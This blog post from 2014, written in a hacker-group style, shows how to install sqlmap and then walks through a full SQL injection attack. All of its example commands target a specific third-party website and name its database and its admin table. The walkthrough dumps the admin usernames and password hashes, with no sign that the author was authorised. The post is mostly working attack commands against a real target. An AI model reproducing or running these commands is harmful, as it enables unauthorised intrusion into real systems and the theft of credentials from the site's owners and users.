2014-02-06

SQLmap installation

Pranaam to all bhai ji _/\_
Today we will learn how to use SQLmap in such linux system where it doesnt installed already
penetration testing based linux os like backtrack backbox blackbunut, sqlmap comes already installed .
but you can use sqlmap on other system easily :)

how ??? ok follow these steps , its really not a big deal ;)

SQLmap official website , from where you can download sqlmap source code
http://sqlmap.org/

download link :-
https://github.com/sqlmapproject/sqlmap/zipball/master


sqlmap source code has been saved with name master
its zip file, to extract its content run command unzip master.
you will get a directory having name sqlmap project something like that, enter into that directory and list files


yesssss :) . here is our sqlmap source code .
sqlmap is coded in python and sqlmap.py is the main file which is used for performing SQL injection.
so lets start >:D<
  you can run sqlmap.py in 2 ways, either using python or using ./ ;)
python sqlmap.py  option
./sqlmap.py option
if sqlmap.py file has execute permission, you can run sqlmap using ./
for listing available options for sqlmap usage , supply -h option
like this
./sqlmap.py -h
he is the link where you can get options
https://github.com/sqlmapproject/sqlmap/wiki/Usage

for example i want to extract database of a sql injection vulnerable website using sqlmap
website link is http://www.iapex.com.pk/messages.php?id=4
command will be
./sqlmap.py  -u http://www.iapex.com.pk/messages.php?id=4   --dbs
here -u stands for sql injection vulnerable url
--dbs stands for databases  \ ^_^ /
as you will run this command , sqlmap will start injecting thi url and will extract databases name


after completion of process , you will get results like this


like, now you want to get list of tables in database, you will need to specify database name
./sqlmap.py  -u webite.com/vulnerable.php?id=4   -D database_name --tables
in my case i am going for database having name iapexcom_new

so command will be
./sqlmap.py  -u http://www.iapex.com.pk/messages.php?id=4   -D iapexcom_new --tables
here -D stands for , database that has to be enumerate
we have 2 databases , we can enumerate tables from these database .
in above command we are enumerating table list of database iapexcom_new


after completion of process , sqlmap will show list of tables under database


and so on :)

as we know
database has tables and every table has columns .
columns contains information/data
so performing sql injection using sqlmap,first we extract database name ,then tables list from that database
after extracting tables name , we select a table and extract list of columns in that table
and then we can get information stored in columns
lets extract columns from table of database ;)
i am going for table es_admin because this table contains columns which has username and password of website admin stored in it :P
 ./sqlmap.py  -u website.com/vulnerable.php?id=4   -D idatabase_name -T table_name --columns
ok
query will be

 ./sqlmap.py  -u http://www.iapex.com.pk/messages.php?id=4   -D iapexcom_new -T es_admin --columns

meaning of this command is
inject a website  url (-u)  http://www.iapex.com.pk/messages.php?id=4  whose database name is  iapexcom_new (-D) and table name is (-T) es_admin and extract names of columns from table


wait for few minutes untill sqlmap extract columns name from table es_admin
it will show result like this


ok now we have columns name too, lets go and extract data stored in these columns :P
command will be
 ./sqlmap.py  -u website.com/vulnerable..php?id=4   -D database_name -T table_name -C column_name --dump

command in my case
./sqlmap.py  -u http://www.iapex.com.pk/messages.php?id=4   -D iapexcom_new -T es_admin -C username,password  --dump


after process completion you will get result like this


you have done >:D<, and you can see username and password hash which are stored in table 'es_admin' in columns having name username and password

this is how you can use sqlmap on linux os where it is not installed already :)
enjoy

Thank you :)

Greetz to :- Guru ji Zero , code breaker ica, Aasim shaikh,Reborn, Raman kumar rana,INX_r0ot,Darkwolf indishell, Chinmay Pandya,L0rd Crus4d3r,Hackuin ,Silent poison India,Magnum sniper,Atul Dwivedi,ethicalnoob Indishell,Local root indishell,Irfninja indishell Hardeep bhai,Mannu,Viki and AR AR bhai ji <3


Share this post

0 comments

:) :-) :)) =)) :( :-( :(( :d :-d @-) :p :o :>) (o) [-( :-? (p) :-s (m) 8-) :-t :-b b-( :-# =p~ :-$ (b) (f) x-) (k) (h) (c) cheer

© 2009 Start With Linux | Mannu Linux
Designed by cyb3r.gladiat0r
Posts RSSComments RSS
Back to top